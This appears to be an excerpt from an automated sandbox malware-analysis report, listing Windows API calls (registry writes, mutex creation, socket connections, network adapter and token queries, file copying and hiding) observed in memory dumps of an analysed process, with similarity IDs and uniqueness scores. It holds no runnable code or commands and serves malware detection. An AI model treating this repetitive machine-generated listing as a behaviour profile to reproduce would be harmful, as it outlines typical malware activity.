                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateMutexW.KERNEL32(?,?), ref: 04BD0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(?,00000E80), ref: 04BD3523
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getaddrinfo
                                                                                              • String ID:
                                                                                              • API String ID: 300660673-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 04BD153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenCurrentUser.KERNEL32(?,00000E80), ref: 04BD39A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenUser
                                                                                              • String ID:
                                                                                              • API String ID: 1571386571-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD525E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationModule
                                                                                              • String ID:
                                                                                              • API String ID: 3425974696-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 04BD536A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 514040917-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD5A90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • gethostname.WS2_32(?,00000E80,?,?), ref: 00ACA2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: gethostname
                                                                                              • String ID:
                                                                                              • API String ID: 144339138-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetAdaptersAddresses.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD32F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdaptersAddresses
                                                                                              • String ID:
                                                                                              • API String ID: 2506852604-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileType.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACBEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3AB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 04BD0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3BB0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeNotifyValue
                                                                                              • String ID:
                                                                                              • API String ID: 3933585183-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00ACB9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetNetworkParams.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3138
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: NetworkParams
                                                                                              • String ID:
                                                                                              • API String ID: 2134775280-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00ACBDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CopyFileW.KERNEL32(?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD5092
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD516E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EnumModulesProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1082081703-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 00ACAC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3CA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00ACB4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAIoctl.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3711
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Ioctl
                                                                                              • String ID:
                                                                                              • API String ID: 3041054344-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateMutexW.KERNEL32(?,?), ref: 04BD0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD6A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACB19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACAD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 04BD0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00ACB9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00ACBAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD525E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationModule
                                                                                              • String ID:
                                                                                              • API String ID: 3425974696-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(?,00000E80), ref: 04BD417B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenCurrentUser.KERNEL32(?,00000E80), ref: 04BD39A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenUser
                                                                                              • String ID:
                                                                                              • API String ID: 1571386571-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD5A90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RasConnectionNotificationW.RASAPI32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD38CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionNotification
                                                                                              • String ID:
                                                                                              • API String ID: 1402429939-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04BD1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3BB0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeNotifyValue
                                                                                              • String ID:
                                                                                              • API String ID: 3933585183-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcessTimes.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04BD3FDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Connect
                                                                                              • String ID:
                                                                                              • API String ID: 3144859779-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD697A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD516E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EnumModulesProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1082081703-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA724
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ACA672
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD4B28
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePeek
                                                                                              • String ID:
                                                                                              • API String ID: 2222842502-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04BD54C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNEL32(?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD4BDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: recv
                                                                                              • String ID:
                                                                                              • API String ID: 1507349165-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD6A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetIfEntry.IPHLPAPI(?,00000E80,?,?), ref: 04BD02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Entry
                                                                                              • String ID:
                                                                                              • API String ID: 3940594292-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DispatchMessageW.USER32(?), ref: 04BD5624
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatchMessage
                                                                                              • String ID:
                                                                                              • API String ID: 2061451462-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ioctlsocket.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD118F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ioctlsocket
                                                                                              • String ID:
                                                                                              • API String ID: 3577187118-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA384
